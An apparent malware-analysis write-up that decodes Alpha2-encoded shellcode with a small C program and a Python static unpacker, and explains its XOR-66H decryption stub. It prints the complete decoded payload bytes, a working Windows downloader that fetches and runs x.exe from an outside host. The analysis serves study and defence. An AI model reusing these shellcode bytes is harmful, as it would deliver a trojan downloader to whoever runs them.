A little Google search indicated it was an open source shellcode encoder, Alpha2, whose source code was available. According to the source code, the strings below were prefixed to the encoded shellcode and should be removed when decoding it.
"TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
Then we got the shellcode below:
Since the source code was available, I wrote a small program in C to decode it:
#include <stdio.h>
#include <stdlib.h>

/* Alpha2 mixed-case decoder: every two characters of the encoded text yield
 * one byte.  High nibble = (low nibble of the 1st char) XOR (high nibble of
 * the 2nd char); low nibble = low nibble of the 2nd char.  Printed as \xHH. */
int main(int argc, char *argv[], char *envp[]) {
    int i, ii, A, B, D, E, F;
    (void)argc; (void)argv; (void)envp;
    while ((i = getchar()) != EOF) {
        if ((ii = getchar()) == EOF)   /* odd trailing character: nothing to pair it with */
            break;
        D = (i & 0x0f);          /* low nibble of the first character */
        E = (ii & 0xf0) >> 4;    /* high nibble of the second character */
        F = (ii & 0x0f);         /* low nibble of the second character */
        A = D ^ E;               /* high nibble of the decoded byte */
        B = F;                   /* low nibble of the decoded byte */
        printf("\\x%X%X", A, B);
    }
    exit(EXIT_SUCCESS);
}
After decoding, we could get the decoded shellcode:
\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x66\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x8F\xB3\x66\x66\x66\x3C\x02\xC7\x56\x66\x66\x66\xED\x26\x6A\xED\x16\x7A\xCB\xED\x26\x6E\xED\xBE\xED\x15\x5A\xED\x12\x78\x1E\x65\x95\xED\x18\x46\x65\x9D\xED\x28\x72\x55\x8B\x30\x31\x37\xED\x59\x65\x9D\xED\x94\x0C\x68\x3F\x95\xC0\x12\x6E\x3F\x39\xE5\xA1\x62\x23\x84\x8F\x3F\x39\x38\xED\xAB\xED\x20\x42\x65\xA5\xB7\x87\x65\xA7\x55\xAF\x00\xED\x6E\xED\x20\x7A\x65\xA5\xA7\x87\x64\x65\xA7\xED\x66\x65\xA5\xED\x9C\xED\x91\xE5\xA0\x68\xED\xB6\x0C\x62\x3F\x8E\x36\x66\x66\x66\xE5\xA0\x6B\x34\x30\x99\x31\x9A\x3C\xED\xBE\x0C\x67\x3F\x8E\x5B\x66\x66\x66\xE5\xA0\x75\x30\x20\xE6\x58\xE6\x13\x9C\xE6\x50\xE6\x38\xE5\x8A\x46\xED\xBA\x0C\x46\x35\x99\x31\x8A\xA1\x62\x65\x3A\x07\x48\x03\xA1\x22\x65\x62\x1E\x03\x66\x66\x55\xA6\x36\x36\x35\x30\x36\x99\x31\x9A\xED\xBA\x36\x35\x99\x31\x96\x36\x99\x31\x92\x55\xA6\xCA\xE3\xA6\x13\x9F\x37\x34\x30\x35\x99\xB4\x3C\x3F\xCD\x84\x88\x55\xA6\xA5\x8E\x40\x99\x99\x99\x21\x03\x12\x36\x14\x09\x05\x27\x02\x02\x14\x03\x15\x15\x66\x21\x03\x12\x35\x1F\x15\x12\x03\x0B\x22\x0F\x14\x03\x05\x12\x09\x14\x1F\x27\x66\x31\x0F\x08\x23\x1E\x03\x05\x66\x23\x1E\x0F\x12\x32\x0E\x14\x03\x07\x02\x66\x2A\x09\x07\x02\x2A\x0F\x04\x14\x07\x14\x1F\x27\x66\x13\x14\x0A\x0B\x09\x08\x66\x33\x34\x2A\x22\x09\x11\x08\x0A\x09\x07\x02\x32\x09\x20\x0F\x0A\x03\x27\x66\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6B\x6F\x31\x31\x38\x2E\x63\x6E\x2F\x78\x2E\x65\x78\x65\x80\x00
This could be converted to an executable file with shellcode_2_exe and then run under OllyDbg. As we can see, the shellcode was still encrypted: the first thing it did was decode the rest of the code, 13CH bytes in total (starting at 00401017), by XORing each byte with 66H.
Then we got the decrypted shellcode. The remaining shellcode would call URLDownloadToFile to download a file from http://www.ko118.cn/x.exe, save it as C:\WINDOWS\system32\a.exe, and then call WinExec to run a.exe.
a.exe was probably a downloader that would fetch more trojans from the Internet.
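As an added example (not code from the original post), the Python script below performs the second stage statically instead of in a debugger: it takes the decoded bytes printed above, recognises the small self-decrypting stub at the front (jmp / pop edx / dec edx / mov cx,13CH / xor byte [edx+ecx],66H / loop / call), reads the length and key out of the stub rather than hard-coding them, XORs exactly the region the stub would, and lists the printable strings so the imported API names and the download URL can be read off. The stub pattern and the offset arithmetic (the call pushes the address of the first encrypted byte, offset 17H from the start, which is 00401017 when the code is loaded at 00401000 as in the post) are taken from the bytes on the page; the function names are mine.

```python
import re
import struct

# The decoded (Alpha2-stripped) shellcode exactly as printed in the post,
# 16 bytes per row.  Offsets 00h-16h are the self-decrypting stub; the body
# after it is XOR 66h encrypted, and the URL at the tail is clear text.
SHELLCODE = bytes.fromhex(
    "EB105A4A33C966B93C0180340A66E2FA"  # 00: jmp +10h; pop edx; dec edx; xor ecx,ecx; mov cx,13Ch; xor byte [edx+ecx],66h; loop
    "EB05E8EBFFFFFF8FB36666663C02C756"  # 10: jmp +5; call -15h (back to pop edx); encrypted body starts at 17h
    "666666ED266AED167ACBED266EEDBEED"
    "155AED12781E6595ED1846659DED2872"
    "558B303137ED59659DED940C683F95C0"
    "126E3F39E5A16223848F3F3938EDABED"
    "204265A5B78765A755AF00ED6EED207A"
    "65A5A7876465A7ED6665A5ED9CED91E5"
    "A068EDB60C623F8E36666666E5A06B34"
    "3099319A3CEDBE0C673F8E5B666666E5"
    "A0753020E658E6139CE650E638E58A46"
    "EDBA0C463599318AA162653A074803A1"
    "2265621E03666655A636363530369931"
    "9AEDBA36359931963699319255A6CAE3"
    "A6139F3734303599B43C3FCD848855A6"
    "A58E4099999921031236140905270202"
    "1403151566210312351F1512030B220F"
    "1403051209141F2766310F08231E0305"
    "66231E0F12320E14030702662A090702"
    "2A0F041407141F276613140A0B090866"
    "33342A220911080A0907023209200F0A"
    "032766687474703A2F2F7777772E6B6F"
    "3131382E636E2F782E6578658000"
)

# Byte pattern of the decoder stub seen at the start of the sample.
STUB = re.compile(
    rb"\xEB\x10"              # jmp short +10h  (over the loop, to the call)
    rb"\x5A\x4A"              # pop edx ; dec edx   -> edx = return address - 1
    rb"\x33\xC9\x66\xB9(..)"  # xor ecx,ecx ; mov cx, <length>
    rb"\x80\x34\x0A(.)"       # xor byte [edx+ecx], <key>
    rb"\xE2\xFA"              # loop (back to the xor)
    rb"\xEB\x05"              # jmp short +5 (into the decrypted body)
    rb"\xE8(....)",           # call rel32 (pushes the body address, lands on pop edx)
    re.DOTALL,
)


def parse_stub(sc: bytes):
    """Return (key, length, start) recovered from the stub, or raise."""
    m = STUB.match(sc)
    if m is None:
        raise ValueError("decoder stub not recognised")
    (length,) = struct.unpack("<H", m.group(1))
    key = m.group(2)[0]
    (rel,) = struct.unpack("<i", m.group(3))
    start = m.end(3)            # return address pushed by the call = first encrypted byte
    if start + rel != 2:        # the call must land on the 'pop edx' at offset 2
        raise ValueError("call target is not the pop edx of the stub")
    return key, length, start


def unpack(sc: bytes) -> bytes:
    """Apply the stub's XOR loop to the region it would decrypt."""
    key, length, start = parse_stub(sc)
    if start + length > len(sc):
        raise ValueError("encrypted region runs past the end of the buffer")
    body = bytes(b ^ key for b in sc[start:start + length])
    return sc[:start] + body + sc[start + length:]


def strings(data: bytes, min_len: int = 5):
    """Printable ASCII runs of at least min_len bytes, in order of appearance."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


if __name__ == "__main__":
    key, length, start = parse_stub(SHELLCODE)
    print(f"stub: key={key:#04x} length={length:#x} region={start:#x}-{start + length - 1:#x}")
    for s in strings(unpack(SHELLCODE)):
        print(s)
```

Run as a script it prints the recovered key, length and region, followed by the decrypted strings (GetProcAddress, GetSystemDirectoryA, WinExec, ExitThread, LoadLibraryA, urlmon, URLDownloadToFileA and the URL). The check that the call really lands on the pop edx is there so that a buffer which merely begins with similar bytes is rejected instead of being XORed with a meaningless key.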